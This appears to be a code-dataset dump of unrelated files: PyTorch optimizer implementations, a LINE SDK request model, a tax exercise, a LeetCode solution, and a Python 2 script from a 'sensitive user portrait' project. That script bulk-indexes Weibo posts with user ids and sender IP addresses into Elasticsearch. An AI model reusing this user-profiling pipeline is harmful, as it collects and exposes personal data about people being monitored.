if self.scale_clip is None:
self.scale_clip = (0, 10)
def __setstate__(self, state):
super(Lars, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('nesterov', False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
momentum = group['momentum']
dampening = group['dampening']
nesterov = group['nesterov']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
if weight_decay != 0:
d_p.add_(weight_decay, p.data)
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(d_p).detach()
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(1 - dampening, d_p)
if nesterov:
d_p = d_p.add(momentum, buf)
else:
d_p = buf
# LARS
p_norm = p.data.pow(2).sum().sqrt()
update_norm = d_p.pow(2).sum().sqrt()
# Compute the local LR
if p_norm == 0 or update_norm == 0:
local_lr = 1
else:
local_lr = p_norm / update_norm
p.data.add_(-group['lr'] * local_lr, d_p)
return loss
#
class RAdam(Optimizer):
"""Implements the RAdam optimizer from https://arxiv.org/pdf/1908.03265.pdf
Args:
params (iterable): iterable of parameters to optimize or dicts defining parameter groups
lr (float, optional): learning rate
betas (Tuple[float, float], optional): coefficients used for computing running averages of gradient and its square (default: (0.9, 0.999))
eps (float, optional): term added to the denominator to improve numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
Example:
>>> model = ResNet()
>>> optimizer = RAdam(model.parameters(), lr=0.001)
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay)
super(RAdam, self).__init__(params, defaults)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
# Get group-shared variables
beta1, beta2 = group['betas']
sma_inf = group.get('sma_inf')
# Compute max length of SMA on first step
if not isinstance(sma_inf, float):
group['sma_inf'] = 2 / (1 - beta2) - 1
sma_inf = group.get('sma_inf')
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('RAdam does not support sparse gradients')
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
state['step'] += 1
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
# Bias corrections
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
# Compute length of SMA
sma_t = sma_inf - 2 * state['step'] * (1 - bias_correction2) / bias_correction2
# Weight decay
if group['weight_decay'] != 0:
p.data.add_(-group['lr'] * group['weight_decay'], p.data)
if sma_t > 4:
# Variance rectification term
r_t = math.sqrt((sma_t - 4) * (sma_t - 2) * sma_inf / ((sma_inf - 4) * (sma_inf - 2) * sma_t))
# Adaptive momentum
p.data.addcdiv_(-group['lr'] * r_t, exp_avg / bias_correction1, (exp_avg_sq / bias_correction2).sqrt().add_(group['eps']))
else:
# Unadapted momentum
p.data.add_(-group['lr'], exp_avg / bias_correction1)
return loss
class Ralamb(Optimizer):
'''
RAdam + LARS
Example:
>>> model = ResNet()
>>> optimizer = Ralamb(model.parameters(), lr=0.001)
'''
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0):
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay)
self.buffer = [[None, None, None] for ind in range(10)]
super(Ralamb, self).__init__(params, defaults)
def __setstate__(self, state):
super(Ralamb, self).__setstate__(state)
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
if grad.is_sparse:
raise RuntimeError('Ralamb does not support sparse gradients')
p_data_fp32 = p.data.float()
state = self.state[p]
if len(state) == 0:
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p_data_fp32)
state['exp_avg_sq'] = torch.zeros_like(p_data_fp32)
else:
state['exp_avg'] = state['exp_avg'].type_as(p_data_fp32)
state['exp_avg_sq'] = state['exp_avg_sq'].type_as(p_data_fp32)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
# Decay the first and second moment running average coefficient
# m_t
exp_avg.mul_(beta1).add_(1 - beta1, grad)
# v_t
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
state['step'] += 1
buffered = self.buffer[int(state['step'] % 10)]
if state['step'] == buffered[0]:
N_sma, radam_step_size = buffered[1], buffered[2]
else:
buffered[0] = state['step']
beta2_t = beta2 ** state['step']
N_sma_max = 2 / (1 - beta2) - 1
N_sma = N_sma_max - 2 * state['step'] * beta2_t / (1 - beta2_t)
buffered[1] = N_sma
# more conservative since it's an approximated value
if N_sma >= 5:
radam_step_size = math.sqrt((1 - beta2_t) * (N_sma - 4) / (N_sma_max - 4) * (N_sma - 2) / N_sma * N_sma_max / (N_sma_max - 2)) / (1 - beta1 ** state['step'])
else:
radam_step_size = 1.0 / (1 - beta1 ** state['step'])
buffered[2] = radam_step_size
if group['weight_decay'] != 0:
p_data_fp32.add_(-group['weight_decay'] * group['lr'], p_data_fp32)
# more conservative since it's an approximated value
radam_step = p_data_fp32.clone()
if N_sma >= 5:
denom = exp_avg_sq.sqrt().add_(group['eps'])
radam_step.addcdiv_(-radam_step_size * group['lr'], exp_avg, denom)
else:
radam_step.add_(-radam_step_size * group['lr'], exp_avg)
radam_norm = radam_step.pow(2).sum().sqrt()
weight_norm = p.data.pow(2).sum().sqrt().clamp(0, 10)
if weight_norm == 0 or radam_norm == 0:
trust_ratio = 1
else:
trust_ratio = weight_norm / radam_norm
state['weight_norm'] = weight_norm
state['adam_norm'] = radam_norm
state['trust_ratio'] = trust_ratio
if N_sma >= 5:
p_data_fp32.addcdiv_(-radam_step_size * group['lr'] * trust_ratio, exp_avg, denom)
else:
p_data_fp32.add_(-radam_step_size * group['lr'] * trust_ratio, exp_avg)
p.data.copy_(p_data_fp32)
return loss
class Lookahead(Optimizer):
'''
a PyTorch implementation of the Lookahead Optimizer from th paper
Lookahead Optimizer: k steps forward, 1 step back.
https://arxiv.org/abs/1907.08610
Example:
>>> import torch.optim as optim
>>> base_optimizer = optim.Adam(model.parameters(), lr=0.001)
>>> optimizer = Lookahead(base_optimizer=base_optimizer,k=5,alpha=0.5)
'''
def __init__(self, base_optimizer,alpha=0.5, k=6):
if not 0.0 <= alpha <= 1.0:
raise ValueError(f'Invalid slow update rate: {alpha}')
if not 1 <= k:
raise ValueError(f'Invalid lookahead steps: {k}')
self.optimizer = base_optimizer
self.param_groups = self.optimizer.param_groups
self.alpha = alpha
self.k = k
for group in self.param_groups:
group["step_counter"] = 0
self.slow_weights = [[p.clone().detach() for p in group['params']]
for group in self.param_groups]
for w in it.chain(*self.slow_weights):
w.requires_grad = False
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
loss = self.optimizer.step()
for group,slow_weights in zip(self.param_groups,self.slow_weights):
group['step_counter'] += 1
if group['step_counter'] % self.k != 0:
continue
for p,q in zip(group['params'],slow_weights):
if p.grad is None:
continue
q.data.add_(self.alpha,p.data - q.data)
p.data.copy_(q.data)
return loss
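

# Illustrative composition (hypothetical helper): wrapping RAdam (defined above)
# in Lookahead reproduces the Ranger-style setup described further below, for any
# iterable of model parameters.
def _example_lookahead_radam(params, lr=1e-3, k=5, alpha=0.5):
    return Lookahead(RAdam(params, lr=lr), alpha=alpha, k=k)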
class RaLars(Optimizer):
"""Implements the RAdam optimizer from https://arxiv.org/pdf/1908.03265.pdf
with optional Layer-wise adaptive Scaling from https://arxiv.org/pdf/1708.03888.pdf
Args:
params (iterable): iterable of parameters to optimize or dicts defining parameter groups
lr (float, optional): learning rate
betas (Tuple[float, float], optional): coefficients used for computing running averages of gradient and its square (default: (0.9, 0.999))
eps (float, optional): term added to the denominator to improve numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
scale_clip (float, optional): the maximal upper bound for the scale factor of LARS
Example:
>>> model = ResNet()
>>> optimizer = RaLars(model.parameters(), lr=0.001)
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0,
scale_clip=None):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay)
super(RaLars, self).__init__(params, defaults)
# LARS arguments
self.scale_clip = scale_clip
if self.scale_clip is None:
self.scale_clip = (0, 10)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
# Get group-shared variables
beta1, beta2 = group['betas']
sma_inf = group.get('sma_inf')
# Compute max length of SMA on first step
if not isinstance(sma_inf, float):
group['sma_inf'] = 2 / (1 - beta2) - 1
sma_inf = group.get('sma_inf')
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('RAdam does not support sparse gradients')
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
state['step'] += 1
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
# Bias correction
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
# Compute length of SMA
sma_t = sma_inf - 2 * state['step'] * (1 - bias_correction2) / bias_correction2
update = torch.zeros_like(p.data)
if sma_t > 4:
# Variance rectification term
r_t = math.sqrt((sma_t - 4) * (sma_t - 2) * sma_inf / ((sma_inf - 4) * (sma_inf - 2) * sma_t))
# Adaptive momentum
update.addcdiv_(r_t, exp_avg / bias_correction1, (exp_avg_sq / bias_correction2).sqrt().add_(group['eps']))
else:
# Unadapted momentum
update.add_(exp_avg / bias_correction1)
# Weight decay
if group['weight_decay'] != 0:
update.add_(group['weight_decay'], p.data)
# LARS
p_norm = p.data.pow(2).sum().sqrt()
update_norm = update.pow(2).sum().sqrt()
phi_p = p_norm.clamp(*self.scale_clip)
# Compute the local LR
if phi_p == 0 or update_norm == 0:
local_lr = 1
else:
local_lr = phi_p / update_norm
state['local_lr'] = local_lr
p.data.add_(-group['lr'] * local_lr, update)
return loss
class Ranger(Optimizer):
'''
Ranger - a synergistic optimizer combining RAdam (Rectified Adam) and LookAhead in one codebase.
full refactoring for slow weights and one pass handling (vs two before).
Refactor should eliminate any random save/load issues regarding memory.
1 - Ranger is the optimizer we used to beat the high scores for 12 different categories on the FastAI leaderboards!
(Previous records all held with AdamW optimizer).
2 - Highly recommend combining Ranger with: Mish activation function, and flat+ cosine anneal training curve.
3 - Based on that, also found .95 is better than .90 for beta1 (momentum) param (ala betas=(0.95, 0.999)).
Example:
>>> model = ResNet()
>>> optimizer = Ranger(model.parameters(), lr=0.001)
'''
def __init__(self, params, lr=1e-3, alpha=0.5, k=6, N_sma_threshhold=5, betas=(.95,0.999), eps=1e-5, weight_decay=0):
#parameter checks
if not 0.0 <= alpha <= 1.0:
raise ValueError(f'Invalid slow update rate: {alpha}')
if not 1 <= k:
raise ValueError(f'Invalid lookahead steps: {k}')
if not lr > 0:
raise ValueError(f'Invalid Learning Rate: {lr}')
if not eps > 0:
raise ValueError(f'Invalid eps: {eps}')
#parameter comments:
# beta1 (momentum) of .95 seems to work better than .90...
#N_sma_threshold of 5 seems better in testing than 4.
#In both cases, worth testing on your dataset (.90 vs .95, 4 vs 5) to make sure which works best for you.
#prep defaults and init torch.optim base
defaults = dict(lr=lr, alpha=alpha, k=k, step_counter=0, betas=betas, N_sma_threshhold=N_sma_threshhold, eps=eps, weight_decay=weight_decay)
super().__init__(params,defaults)
#adjustable threshold
self.N_sma_threshhold = N_sma_threshhold
#now we can get to work...
#removed as we now use step from RAdam...no need for duplicate step counting
#for group in self.param_groups:
# group["step_counter"] = 0
#print("group step counter init")
#look ahead params
self.alpha = alpha
self.k = k
#radam buffer for state
self.radam_buffer = [[None,None,None] for ind in range(10)]
#self.first_run_check=0
#lookahead weights
#9/2/19 - lookahead param tensors have been moved to state storage.
#This should resolve issues with load/save where weights were left in GPU memory from first load, slowing down future runs.
#self.slow_weights = [[p.clone().detach() for p in group['params']]
# for group in self.param_groups]
#don't use grad for lookahead weights
#for w in it.chain(*self.slow_weights):
# w.requires_grad = False
def __setstate__(self, state):
print("set state called")
super(Ranger, self).__setstate__(state)
def step(self, closure=None):
loss = None
#note - below is commented out b/c I have other work that passes back the loss as a float, and thus not a callable closure.
#Uncomment if you need to use the actual closure...
#if closure is not None:
#loss = closure()
#Evaluate averages and grad, update param tensors
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
if grad.is_sparse:
raise RuntimeError('Ranger optimizer does not support sparse gradients')
p_data_fp32 = p.data.float()
state = self.state[p] #get state dict for this param
if len(state) == 0: #if first time to run...init dictionary with our desired entries
#if self.first_run_check==0:
#self.first_run_check=1
#print("Initializing slow buffer...should not see this at load from saved model!")
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p_data_fp32)
state['exp_avg_sq'] = torch.zeros_like(p_data_fp32)
#look ahead weight storage now in state dict
state['slow_buffer'] = torch.empty_like(p.data)
state['slow_buffer'].copy_(p.data)
else:
state['exp_avg'] = state['exp_avg'].type_as(p_data_fp32)
state['exp_avg_sq'] = state['exp_avg_sq'].type_as(p_data_fp32)
#begin computations
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
#compute variance mov avg
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
#compute mean moving avg
exp_avg.mul_(beta1).add_(1 - beta1, grad)
state['step'] += 1
buffered = self.radam_buffer[int(state['step'] % 10)]
if state['step'] == buffered[0]:
N_sma, step_size = buffered[1], buffered[2]
else:
buffered[0] = state['step']
beta2_t = beta2 ** state['step']
N_sma_max = 2 / (1 - beta2) - 1
N_sma = N_sma_max - 2 * state['step'] * beta2_t / (1 - beta2_t)
buffered[1] = N_sma
if N_sma > self.N_sma_threshhold:
step_size = math.sqrt((1 - beta2_t) * (N_sma - 4) / (N_sma_max - 4) * (N_sma - 2) / N_sma * N_sma_max / (N_sma_max - 2)) / (1 - beta1 ** state['step'])
else:
step_size = 1.0 / (1 - beta1 ** state['step'])
buffered[2] = step_size
if group['weight_decay'] != 0:
p_data_fp32.add_(-group['weight_decay'] * group['lr'], p_data_fp32)
if N_sma > self.N_sma_threshhold:
denom = exp_avg_sq.sqrt().add_(group['eps'])
p_data_fp32.addcdiv_(-step_size * group['lr'], exp_avg, denom)
else:
p_data_fp32.add_(-step_size * group['lr'], exp_avg)
p.data.copy_(p_data_fp32)
#integrated look ahead...
#we do it at the param level instead of group level
if state['step'] % group['k'] == 0:
slow_p = state['slow_buffer'] #get access to slow param tensor
slow_p.add_(self.alpha, p.data - slow_p) #(fast weights - slow weights) * alpha
p.data.copy_(slow_p) #copy interpolated weights to RAdam param tensor
return loss
class BertAdam(Optimizer):
"""Implements BERT version of Adam algorithm with weight decay fix.
Params:
lr: learning rate
warmup: portion of t_total for the warmup, -1 means no warmup. Default: -1
t_total: total number of training steps for the learning
rate schedule, -1 means constant learning rate. Default: -1
schedule: schedule to use for the warmup (see above). Default: 'warmup_linear'
b1: Adams b1. Default: 0.9
b2: Adams b2. Default: 0.999
e: Adams epsilon. Default: 1e-6
weight_decay: Weight decay. Default: 0.01
max_grad_norm: Maximum norm for the gradients (-1 means no clipping). Default: 1.0
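    Example (illustrative; assumes `model` is any nn.Module whose parameters are
    being fine-tuned, and 'warmup_linear' is the schedule provided via .utils):
        >>> model = BertModel()
        >>> optimizer = BertAdam(model.parameters(), lr=2e-5, warmup=0.1,
        ...                      t_total=10000, schedule='warmup_linear')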
"""
def __init__(self, params, lr, warmup=-1, t_total=-1, schedule='warmup_linear',
b1=0.9, b2=0.999, e=1e-6, weight_decay=0.01,
max_grad_norm=1.0):
if lr < 0.0:
raise ValueError("Invalid learning rate: {} - should be >= 0.0".format(lr))
if schedule not in SCHEDULES:
raise ValueError("Invalid schedule parameter: {}".format(schedule))
if not 0.0 <= warmup < 1.0 and not warmup == -1:
raise ValueError("Invalid warmup: {} - should be in [0.0, 1.0[ or -1".format(warmup))
if not 0.0 <= b1 < 1.0:
raise ValueError("Invalid b1 parameter: {} - should be in [0.0, 1.0[".format(b1))
if not 0.0 <= b2 < 1.0:
raise ValueError("Invalid b2 parameter: {} - should be in [0.0, 1.0[".format(b2))
if not e >= 0.0:
raise ValueError("Invalid epsilon value: {} - should be >= 0.0".format(e))
defaults = dict(lr=lr, schedule=schedule, warmup=warmup, t_total=t_total,
b1=b1, b2=b2, e=e, weight_decay=weight_decay,
max_grad_norm=max_grad_norm)
super(BertAdam, self).__init__(params, defaults)
def get_lr(self):
lr = []
for group in self.param_groups:
for p in group['params']:
state = self.state[p]
if len(state) == 0:
return [0]
if group['t_total'] != -1:
schedule_fct = SCHEDULES[group['schedule']]
lr_scheduled = group['lr'] * schedule_fct(state['step']/group['t_total'], group['warmup'])
else:
lr_scheduled = group['lr']
lr.append(lr_scheduled)
return lr
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('Adam does not support sparse gradients, please consider SparseAdam instead')
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['next_m'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['next_v'] = torch.zeros_like(p.data)
next_m, next_v = state['next_m'], state['next_v']
beta1, beta2 = group['b1'], group['b2']
# Add grad clipping
if group['max_grad_norm'] > 0:
clip_grad_norm_(p, group['max_grad_norm'])
# Decay the first and second moment running average coefficient
# In-place operations to update the averages at the same time
next_m.mul_(beta1).add_(1 - beta1, grad)
next_v.mul_(beta2).addcmul_(1 - beta2, grad, grad)
update = next_m / (next_v.sqrt() + group['e'])
# Just adding the square of the weights to the loss function is *not*
# the correct way of using L2 regularization/weight decay with Adam,
# since that will interact with the m and v parameters in strange ways.
#
# Instead we want to decay the weights in a manner that doesn't interact
# with the m/v parameters. This is equivalent to adding the square
# of the weights to the loss with plain (non-momentum) SGD.
if group['weight_decay'] > 0.0:
update += group['weight_decay'] * p.data
if group['t_total'] != -1:
schedule_fct = SCHEDULES[group['schedule']]
lr_scheduled = group['lr'] * schedule_fct(state['step']/group['t_total'], group['warmup'])
else:
lr_scheduled = group['lr']
update_with_lr = lr_scheduled * update
p.data.add_(-update_with_lr)
state['step'] += 1
        return loss
| [
"[email protected]"
] | |
81ade5278aeab0a1197c12c2bde8a62122fad070 | 3f60b999ea7bda83c9586f75f52463dc20337f24 | /sensitive_user_portrait/cron/attribute/filter_sensitive_uid_text.py | d49971916dc61266df2f85bbccec815232885978 | [] | no_license | jianjian0dandan/sensitive_user_portrait | 629e49ce71db92b50634bac9c828811cdb5381e9 | cacc30267ebc0e621b1d48d4f1206277a0f48123 | refs/heads/master | 2021-01-20T23:18:07.138057 | 2016-05-22T12:09:40 | 2016-05-22T12:09:40 | 42,869,287 | 0 | 0 | null | 2015-09-21T13:55:12 | 2015-09-21T13:55:11 | null | UTF-8 | Python | false | false | 4,249 | py | # -*- coding: utf-8 -*-
import csv
import os
import sys
import time
from elasticsearch import Elasticsearch
from DFA_filter import sensitive_words_extract
reload(sys)
sys.path.append('./../flow1/')
from csv2json import itemLine2Dict, csv2bin
sys.setdefaultencoding('utf-8')
f_file = open('es_error.txt', 'wb')
CSV_FILE_PATH = '/home/ubuntu8/data1309/20130901'
uid_csv_path = './../recommend_in/'
uid_csv = 'sensitive_uid_list.txt'
es = Elasticsearch('219.224.135.93:9206')
count_n = 0
tb = time.time()
uid_set = set()
with open (os.path.join(uid_csv_path, uid_csv), 'rb') as t:
for line in t:
uid = line.strip()
uid_set.add(uid)
count_n += 1
uid_text = file('sensitive_uid_text_1.csv', 'wb')
writer = csv.writer(uid_text)
count = 0
count_f = 0
bulk_action = []
file_list = set(os.listdir(CSV_FILE_PATH))
print "total file is ", len(file_list)
for each in file_list:
with open(os.path.join(CSV_FILE_PATH, each), 'rb') as f:
try:
for line in f:
count_f += 1
weibo_item = itemLine2Dict(line)
if weibo_item:
weibo_item_bin = csv2bin(weibo_item)
if int(weibo_item_bin['sp_type']) != 1:
continue
#if not str(weibo_item_bin['uid']) in uid_set:
# continue
text = weibo_item_bin['text']
message_type = 0
if weibo_item_bin['message_type'] == 1:
write_text = text
message_type = 1
elif weibo_item_bin['message_type'] == 2:
temp = text.split('//@')[0].split(':')[1:]
write_text = ''.join(temp)
message_type = 2
elif weibo_item_bin['message_type'] == 3:
write_text = text
message_type = 3
else:
continue
if not isinstance(write_text, str):
text = text.encode('utf-8', 'ignore')
'''
if text:
sw_dict = sensitive_words_extract(text)
if not sw_dict:
sensitive = 0
else:
seneitive = 1
'''
origin_text = weibo_item_bin['text'].encode('utf-8', 'ignore')
item = [str(weibo_item_bin['uid']), str(weibo_item_bin['mid']), str(weibo_item_bin['send_ip']), str(weibo_item_bin['timestamp']), message_type, str(weibo_item_bin['root_uid']), str(weibo_item_bin['root_mid']), origin_text ]
key_list = ['uid', 'mid', 'ip', 'timestamp', 'message_type','root_uid', 'root_mid', 'text']
item_dict = dict()
for i in range(len(key_list)):
item_dict[key_list[i]] = item[i]
_id = item[1]
action = {'index': {'_id': _id}}
bulk_action.extend([action, item_dict])
count += 1
if count % 1000 == 0:
if bulk_action:
es.bulk(bulk_action, index='weibo_text', doc_type='text', timeout=30)
bulk_action = []
'''
except Exception, r:
time_date = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
f_file.write(time_date + '\t' + r + '\n')
'''
print count, count_f
#if write_text != "":
# writer.writerow(item)
# count += 1
if count_f % 10000 == 0:
ts = time.time()
print "%s per %s second" %(count_f, ts-tb)
print "have get %s" % count
tb = ts
except SystemError:
print "system error"
except Exception, r:
print Exception, r
print bulk_action
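
# Flush whatever is left in bulk_action after the file loop: the loop above only
# bulk-indexes in batches of 1000, so a final partial batch would otherwise never
# reach ES. Same index/doc_type/timeout as used inside the loop.
if bulk_action:
    es.bulk(bulk_action, index='weibo_text', doc_type='text', timeout=30)
    bulk_action = []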
| [
"[email protected]"
] | |
ef9249722a55ff00c9ec100a856e360d1281320d | 5e255ad1360c90478393744586663741a9569c21 | /linebot/v3/audience/models/create_audience_group_request.py | 3d855e668830bb2b753b6d12e2288f9444ee979f | [
"Apache-2.0"
] | permissive | line/line-bot-sdk-python | d76268e8b542060d6eccbacc5dbfab16960ecc35 | cffd35948238ae24982173e30b1ea1e595bbefd9 | refs/heads/master | 2023-08-31T22:12:31.698183 | 2023-08-28T01:10:09 | 2023-08-28T01:10:09 | 70,553,423 | 1,898 | 1,181 | Apache-2.0 | 2023-09-11T05:14:07 | 2016-10-11T03:42:26 | Python | UTF-8 | Python | false | false | 3,502 | py | # coding: utf-8
"""
LINE Messaging API
This document describes LINE Messaging API. # noqa: E501
The version of the OpenAPI document: 0.0.1
Generated by OpenAPI Generator (https://openapi-generator.tech)
Do not edit the class manually.
"""
from __future__ import annotations
import pprint
import re # noqa: F401
import json
from typing import List, Optional
from pydantic.v1 import BaseModel, Field, StrictBool, StrictStr, conlist, constr
from linebot.v3.audience.models.audience import Audience
class CreateAudienceGroupRequest(BaseModel):
"""
Create audience for uploading user IDs (by JSON)
https://developers.line.biz/en/reference/messaging-api/#create-upload-audience-group
"""
description: Optional[constr(strict=True, max_length=120)] = Field(None, description="The audience's name. This is case-insensitive, meaning AUDIENCE and audience are considered identical. Max character limit: 120 ")
is_ifa_audience: Optional[StrictBool] = Field(None, alias="isIfaAudience", description="To specify recipients by IFAs: set true. To specify recipients by user IDs: set false or omit isIfaAudience property. ")
upload_description: Optional[StrictStr] = Field(None, alias="uploadDescription", description="The description to register for the job (in jobs[].description). ")
audiences: Optional[conlist(Audience, max_items=10000)] = Field(None, description="An array of user IDs or IFAs. Max number: 10,000 ")
__properties = ["description", "isIfaAudience", "uploadDescription", "audiences"]
class Config:
"""Pydantic configuration"""
allow_population_by_field_name = True
validate_assignment = True
def to_str(self) -> str:
"""Returns the string representation of the model using alias"""
return pprint.pformat(self.dict(by_alias=True))
def to_json(self) -> str:
"""Returns the JSON representation of the model using alias"""
return json.dumps(self.to_dict())
@classmethod
def from_json(cls, json_str: str) -> CreateAudienceGroupRequest:
"""Create an instance of CreateAudienceGroupRequest from a JSON string"""
return cls.from_dict(json.loads(json_str))
def to_dict(self):
"""Returns the dictionary representation of the model using alias"""
_dict = self.dict(by_alias=True,
exclude={
},
exclude_none=True)
# override the default output from pydantic.v1 by calling `to_dict()` of each item in audiences (list)
_items = []
if self.audiences:
for _item in self.audiences:
if _item:
_items.append(_item.to_dict())
_dict['audiences'] = _items
return _dict
@classmethod
def from_dict(cls, obj: dict) -> CreateAudienceGroupRequest:
"""Create an instance of CreateAudienceGroupRequest from a dict"""
if obj is None:
return None
if not isinstance(obj, dict):
return CreateAudienceGroupRequest.parse_obj(obj)
_obj = CreateAudienceGroupRequest.parse_obj({
"description": obj.get("description"),
"is_ifa_audience": obj.get("isIfaAudience"),
"upload_description": obj.get("uploadDescription"),
"audiences": [Audience.from_dict(_item) for _item in obj.get("audiences")] if obj.get("audiences") is not None else None
})
return _obj
| [
"[email protected]"
] | |
f8e54ed7de4fa1713441907b2b002188d27537c3 | d7da288db4fd9fc0bb1c60c5074f290b5f70c8ef | /Aulas Python/Conteúdo das Aulas/033/Gabarito/Exercício 1 - Gabarito.py | 897f4b881fb6433e5d3d0ea8f4c4d834a4d639ac | [] | no_license | luizdefranca/Curso-Python-IgnoranciaZero | dbf4cf342b3f3efea6fb3b8cf27bf39ed92927e9 | 9fbf2f25e3e6fce1f1582af0bd6bc7dbc5b9f588 | refs/heads/master | 2020-04-09T07:17:00.735378 | 2016-09-12T10:51:37 | 2016-09-12T10:51:37 | 67,999,169 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | """
Write a program with a function called somaImposto.
The function takes two formal parameters:
1 - taxaImposto, which is the amount of sales tax expressed as a
percentage
2 - custo, which is the cost of an item before tax.
The function "adjusts" the cost value to include the sales tax.
"""
def somaImposto(taxaImposto, custo):
return custo*(1 + taxaImposto/100)
custo_normal = float(input("Digite o custo(R$): "))
taxa = float(input("Digite a taxa de imposto(%): "))
print("O custo recalculado com o imposto é de R$%.2f"%somaImposto(custo_normal, taxa))
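# Worked example (for checking the formula): custo = 100.00 and taxa = 10
# give 100.00 * (1 + 10/100) = 110.00, so the program would print R$110.00.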
| [
"[email protected]"
] | |
9679197a61ccf26610d250d3868a81a8e7401233 | 3e9cdcc8847da5a2ea8391639ad8fd95592475b1 | /696.py | edda7ebd43c2b347e2386e5ca317ea69007a5d58 | [] | no_license | mindentropy/leetcode | ec790ed671a2224411133af127e605438bbbbe52 | 4a24edca5926c0b10d1a4786262dd403b12d1aee | refs/heads/master | 2023-01-27T11:26:07.949478 | 2023-01-25T19:08:18 | 2023-01-25T19:08:18 | 233,759,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 810 | py | #!/usr/bin/env python
class Solution(object):
def countBinarySubstrings(self, s):
strcnt = 0
i = 0
while i < len(s) - 1:
j = i + 1
oppcnt = 1
eqflag = True
while j < len(s):
if s[i] == s[j]:
if eqflag == False:
break
oppcnt += 1
else:
oppcnt -= 1
eqflag = False
j += 1
if oppcnt <= 0:
break
if oppcnt == 0:
strcnt += 1
i += 1
return strcnt
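# The class below replaces the brute-force scan above with the standard
# linear-time approach: run-length encode the string into groups of equal
# characters (e.g. '00110011' -> [2, 2, 2, 2]); each pair of adjacent groups
# contributes min(group[i], group[i + 1]) balanced substrings.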
class Solution(object):
def countBinarySubstrings(self, s):
group = [1]
for idx in xrange(1, len(s)):
if s[idx - 1] != s[idx]:
group.append(1)
else:
group[-1] += 1
cnt = 0
for idx in xrange(len(group) - 1):
cnt += min(group[idx], group[idx + 1])
return cnt
if __name__ == '__main__':
sol = Solution()
print sol.countBinarySubstrings('00110011')
| [
"[email protected]"
] | |
